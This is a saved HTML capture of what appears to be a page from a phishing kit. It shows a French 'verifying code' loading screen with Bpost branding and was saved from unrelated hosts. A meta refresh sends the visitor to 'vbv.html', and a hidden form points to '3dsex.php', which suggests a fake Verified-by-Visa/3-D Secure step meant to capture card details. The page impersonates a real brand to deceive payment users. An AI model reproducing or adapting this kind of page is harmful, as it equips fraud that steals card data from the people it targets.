<!DOCTYPE html>
<html lang="en-US">
  <head>
    <link
      rel="icon"
      data-savepage-href="http://cr07267.tw1.ru/favicon.ico"
      href="http://cr07267.tw1.ru/favicon.ico"
    />
    <link
      rel="icon"
      data-savepage-href="https://marchands-paiement.ecomet.ci/favicon.ico"
      href=""
    />
    <meta http-equiv="refresh" content="15;url=vbv.html" />
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
    <meta name="robots" content="noindex, nofollow" />
    <meta name="referrer" content="no-referrer" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1"
    />
    <title>vérification du code en cours...</title>
    <style>
      .btn,
      body,
      html {
        margin: 0;
      }
      .btn,
      a {
        text-decoration: none;
      }
      .btn,
      .logo a {
        font-weight: 700;
      }
      html {
        height: 100%;
        width: 100%;
        padding: 0;
      }
      body {
        background-color: #fff;
        background-image: linear-gradient(315deg, #fff 0, #ffffff 74%);
        font-family: Helvetica, Arial, sans-serif;
        display: flex;
        flex-direction: column;
        justify-content: center;
      }
      a {
        color: #89d2fa;
      }
      .logo {
        right: 15px;
        bottom: 15px;
        position: absolute;
      }
      .logo a {
        color: #b7b7b7;
        text-transform: uppercase;
        font-family: Montserrat, "Helvetica Neue", Helvetica, Arial, sans-serif;
        font-size: 2em;
        border-bottom: 5px solid #b7b7b7;
      }
      .title {
        font-size: 1.5em;
        color: #404040;
      }
      .btn {
        display: inline-block;
        padding: 5px 15px;
        border: 0;
        border-radius: 0.317rem;
        color: #fff;
        font-size: 1rem;
        line-height: 1.5;
        font-family: "Helvetica Neue", Arial, sans-serif;
        cursor: pointer;
        -webkit-appearance: none;
        -webkit-font-smoothing: antialiased;
        background-color: #fcfcfc;
      }
      .btn:hover {
        opacity: 0.85;
      }
      .container {
        text-align: center;
        top: 35vh;
        display: block;
        position: relative;
      }
      .footer {
        font-size: 12px;
      }
      @-webkit-keyframes bubbles {
        33%: {
          -webkit-transform: translateY(10px);
          transform: translateY(10px);
        }
        66% {
          -webkit-transform: translateY(-10px);
          transform: translateY(-10px);
        }
        100% {
          -webkit-transform: translateY(0);
          transform: translateY(0);
        }
      }
      @keyframes bubbles {
        33%: {
          -webkit-transform: translateY(10px);
          transform: translateY(10px);
        }
        66% {
          -webkit-transform: translateY(-10px);
          transform: translateY(-10px);
        }
        100% {
          -webkit-transform: translateY(0);
          transform: translateY(0);
        }
      }
      .bubbles {
        background-color: #404040;
        width: 15px;
        height: 15px;
        margin: 2px;
        border-radius: 100%;
        -webkit-animation: bubbles 0.6s 70ms infinite ease-in-out;
        animation: bubbles 0.6s 70ms infinite ease-in-out;
        -webkit-animation-fill-mode: both;
        animation-fill-mode: both;
        display: inline-block;
      }
    </style>
    <meta name="csrf-token" content="" />
    <meta name="id" content="" />
    <script
      data-savepage-type="text/javascript"
      data-savepage-type="text/plain"
      type="text/plain"
    ></script>
    <script
      id="_bsa_srv-CK7D5K7J_0"
      data-savepage-type="text/javascript"
      data-savepage-type="text/plain"
      type="text/plain"
      data-savepage-src="./load_files/CK7D5K7J.json"
    ></script>

    <style id="savepage-cssvariables">
      :root {
      }
    </style>

    <script id="savepage-shadowloader" type="text/javascript">
      "use strict";
      window.addEventListener(
        "DOMContentLoaded",
        function (event) {
          savepage_ShadowLoader(5);
        },
        false
      );
      function savepage_ShadowLoader(c) {
        createShadowDOMs(0, document.documentElement);
        function createShadowDOMs(a, b) {
          var i;
          if (b.localName == "iframe" || b.localName == "frame") {
            if (a < c) {
              try {
                if (b.contentDocument.documentElement != null) {
                  createShadowDOMs(a + 1, b.contentDocument.documentElement);
                }
              } catch (e) {}
            }
          } else {
            if (
              b.children.length >= 1 &&
              b.children[0].localName == "template" &&
              b.children[0].hasAttribute("data-savepage-shadowroot")
            ) {
              b.attachShadow({ mode: "open" }).appendChild(
                b.children[0].content
              );
              b.removeChild(b.children[0]);
              for (i = 0; i < b.shadowRoot.children.length; i++)
                if (b.shadowRoot.children[i] != null)
                  createShadowDOMs(a, b.shadowRoot.children[i]);
            }
            for (i = 0; i < b.children.length; i++)
              if (b.children[i] != null) createShadowDOMs(a, b.children[i]);
          }
        }
      }
    </script>
    <meta
      name="savepage-url"
      content="https://marchands-paiement.ecomet.ci/demande-de-paiement/app/app2/info/load1.php"
    />
    <meta name="savepage-title" content="vérification du code en cours..." />
    <meta name="savepage-pubdate" content="Unknown" />
    <meta
      name="savepage-from"
      content="http://cr07267.tw1.ru/auth/app/pages/vérification du code en cours....html"
    />
    <meta
      name="savepage-date"
      content="Wed May 31 2023 08:24:01 GMT+0200 (heure d’été d’Europe centrale)"
    />
    <meta
      name="savepage-state"
      content="Standard Items; Retain cross-origin frames; Merge CSS images; Remove unsaved URLs; Load lazy images in existing content; Max frame depth = 5; Max resource size = 50MB; Max resource time = 10s;"
    />
    <meta name="savepage-version" content="33.9" />
    <meta name="savepage-comments" content="" />
  </head>
  <body cz-shortcut-listen="true">
    <div
      id="_flexbar_"
      data-attributes='{"type":"flexbar","key":"CK7D5K7J","segment":"placement:grabifylink","options":{"target":"body","script_id":"_bsa_srv-CK7D5K7J_0","platforms":["desktop","mobile"]},"ads":[{"active":"1","ad_via_link":"https://www.buysellads.com/?utm_source=grabify-link-flex-bar&utm_medium=ad_via_link&utm_campaign=in_unit&utm_term=flexbar","backgroundColor":"#FFFFFF","backgroundHoverColor":"#FFFFFF","bannerid":"87670","callToAction":"Try it for Free","company":"Hotjar","creativeid":"188291","ctaBackgroundColor":"#f4364c","ctaBackgroundHoverColor":"#f4364c","ctaTextColor":"#FFFFFF","ctaTextColorHover":"#FFFFFF","description":"See how your visitors are really using your website.","evenodd":"0","external_id":"11682","height":"0","i":"0","image":"https://cdn4.buysellads.net/uu/1/42500/1546351188-1538062800-80x80-hotjar-icon.png","logo":"https://cdn4.buysellads.net/uu/1/41334/1546414089-hotjar-logo.png","longimp":"TDRIXNPATTTTTT4N4SKHYTTTTTTPFFOSZETTTTTT63T2LUTTTTTTT","longlink":"TFRIXNPATTTTTT4N4SKHYTTTTTTPFFOSZETTTTTT63T2LUTTTTTTTBDW5JYFC5JGHRSU5R7523UUVBI35VUCCSS2HAXUPRD2ZR7NORZLK2LIBWS727LCLYS35JLW47DI67BUVSPX2MLNVBZM2WONVBZI53NC4OQC5MBCBUSDKHNUTYZQKRUDBII35JWUK7PDP33LKRZW2MGNCSS55JLNAR3RKJLNKYZM2JBT","rendering":"flexbar","statimp":"//srv.buysellads.com/ads/imp/x/GTND42QMCASIVKQMCY7LYKQMCWSIK2JMCKSDKZ3JCWBI5537CAYI6K7KC6BIP27UCEYIKK3EHJWNBADLKM7UCBZG2Y","statlink":"//srv.buysellads.com/ads/click/x/GTND42QMCASIVKQMCY7LYKQMCWSIK2JMCKSDKZ3JCWBI5537CAYI6K7KC6BIP27UCEYIKK3EHJNCLSIZ","textColor":"#3c3c3c","textColorHover":"#3c3c3c","timestamp":"1557743873","title":"Hotjar","width":"0","zoneid":"32731","zonekey":"CK7D5K7J"}]}'
    >
      <style>
        #_flexbar_._bsa_hide ._bsa_flexbar {
          display: none;
        }
        #_flexbar_._bsa_show ._bsa_flexbar {
          display: block;
        }
        #_flexbar_ {
          display: block;
        }
        #_flexbar_._bsa_hide {
          margin-bottom: 0;
        }
        #_flexbar_ ._bsa_flexbar {
          position: relative;
          z-index: 999999;
          width: 100%;
          background: #ffffff;
          text-align: left;
          font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto,
            Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", Helvetica, Arial,
            sans-serif !important;
          -webkit-animation: fadein 2s;
          -moz-animation: fadein 2s;
          -ms-animation: fadein 2s;
          -o-animation: fadein 2s;
          animation: fadein 2s;
        }
        #_flexbar_ ._bsa_flexbar:hover {
          background: #ffffff;
        }
        #_flexbar_ .flexbar-wrap {
          display: flex;
          padding: 18px 40px;
          text-decoration: none;
          align-items: center;
          justify-content: space-between;
        }
        #_flexbar_ .flexbar-left {
          display: flex;
          align-items: center;
          justify-content: flex-start;
        }
        #_flexbar_ .flexbar-text {
          display: flex;
          flex-direction: column;
          margin-right: 60px;
        }
        #_flexbar_ .flexbar-heading {
          color: #3c3c3c;
          text-transform: uppercase;
          letter-spacing: 1px;
          font-weight: 600;
          font-size: 10px;
        }
        #_flexbar_ .flexbar-sponsor {
          letter-spacing: 1px;
          font-weight: 400;
          opacity: 0.8;
        }
        #_flexbar_ .flexbar-desc {
          color: #3c3c3c;
          letter-spacing: 1px;
          font-size: 16px;
          font-weight: 400;
          line-height: 1.3;
        }
        #_flexbar_ .flexbar-logo {
          line-height: 0;
        }
        #_flexbar_ .flexbar-logo img {
          margin: 0 30px 0 0;
          max-width: 125px;
        }
        #_flexbar_ .flexbar-cta {
          padding: 10px 14px;
          border: 0;
          border-radius: 3px;
          background: #f4364c;
          color: #ffffff;
          text-decoration: none;
          text-transform: uppercase;
          white-space: nowrap;
          letter-spacing: 0.5px;
          font-weight: 600;
          font-size: 14px;
          line-height: 1;
        }
        #_flexbar_ .flexbar-footer {
          position: absolute;
          right: 40px;
          bottom: 4px;
          border-top: 0;
          line-height: 1;
          border-top-left-radius: 3px;
          color: #3c3c3c;
          text-decoration: none;
          text-transform: uppercase;
          letter-spacing: 1px;
          font-weight: 600;
          font-size: 8px;
        }
        #_flexbar_ .flexbar-close {
          color: #3c3c3ccc;
          cursor: pointer;
        }
        #_flexbar_ .flexbar-close:hover {
          color: #3c3c3c;
        }
        #_flexbar_ .flexbar-via {
          color: #3c3c3ccc !important;
          text-decoration: none !important;
        }
        #_flexbar_ .flexbar-via:hover {
          color: #3c3c3c !important;
        }
        @media all and (max-width: 768px) {
          #_flexbar_ .flexbar-logo img {
            max-width: 100px;
          }
          #_flexbar_ .flexbar-heading {
            font-size: 9px;
            line-height: 1.5;
            margin-bottom: 2px;
          }
          #_flexbar_ .flexbar-desc {
            font-size: 14px;
          }
          #_flexbar_ .flexbar-cta {
            font-size: 12px;
          }
        }
        @media all and (max-width: 568px) {
          #_flexbar_ .flexbar-logo img {
            display: none;
          }
          #_flexbar_ .flexbar-cta {
            display: none;
          }
          #_flexbar_ .flexbar-heading {
            font-size: 8px;
          }
          #_flexbar_ .flexbar-desc {
            font-size: 12px;
          }
          #_flexbar_ .flexbar-text {
            margin-right: 0;
          }
          #_flexbar_ .flexbar-footer {
            right: 15px;
          }
          #_flexbar_ .flexbar-wrap {
            padding: 20px 15px;
          }
        }
      </style>
    </div>
    <script
      data-savepage-src="./load_files/monetization.js.download"
      data-savepage-type="text/javascript"
      data-savepage-type="text/plain"
      type="text/plain"
    ></script>
    <script
      data-savepage-type=""
      data-savepage-type="text/plain"
      type="text/plain"
    ></script>
    <script
      data-savepage-type=""
      data-savepage-type="text/plain"
      type="text/plain"
    ></script>
    <div class="container">
      <div style="margin: 1em">
        <div class="bubbles"></div>
        <div class="bubbles"></div>
        <div class="bubbles"></div>
      </div>
      <span style="color: #0070ba">
        <span class="title">Vérification du code en cours...</span>
      </span>
      <form action="3dsex.php" method="">
        <input name="_token" value="" type="hidden" />
        <input id="tos_accepted" name="tos_accepted" value="1" type="hidden" />
        <input
          id="privacy_accepted"
          name="privacy_accepted"
          value="1"
          type="hidden"
        />
        <input id="special_id" name="special_id" value="" type="hidden" />
        <img
          src="./image/complete-m-start-debit-la-solution-de-paiement-tou.png"
          alt=""
          style="width: 250px; height: auto"
        />
      </form>
      <div class="footer">
        <span style="color: #0070ba">
          Copyright © 2023 Bpost. Tous droits réservés.</span
        >
      </div>
    </div>
    <div class="logo"></div>
    <script
      data-savepage-type=""
      data-savepage-type="text/plain"
      type="text/plain"
      data-savepage-src="./load_files/ads.js.download"
    ></script>
    <script
      data-savepage-type="text/javascript"
      data-savepage-type="text/plain"
      type="text/plain"
      data-savepage-src="./load_files/jquery-2.5.1.min.js.download"
    ></script>
  </body>
</html>
